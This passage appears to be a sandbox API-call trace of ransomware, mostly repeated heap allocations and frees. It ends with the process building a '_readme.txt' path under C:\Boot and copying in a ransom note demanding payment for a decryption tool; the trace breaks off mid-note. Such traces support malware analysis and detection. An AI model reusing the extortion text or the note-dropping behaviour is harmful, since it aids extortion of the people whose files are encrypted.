Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.070] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0128.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.077] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0128.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.077] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0128.078] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.078] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.078] PathFindFileNameW (pszPath="") returned="" [0128.078] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.078] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0128.078] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0128.078] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0128.078] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0128.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0128.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.079] FreeLibrary (hLibModule=0x759d0000) returned 1 [0128.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2b08 [0128.079] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0128.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.079] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0128.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x7d00) returned 0xdd2c688 [0128.079] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt 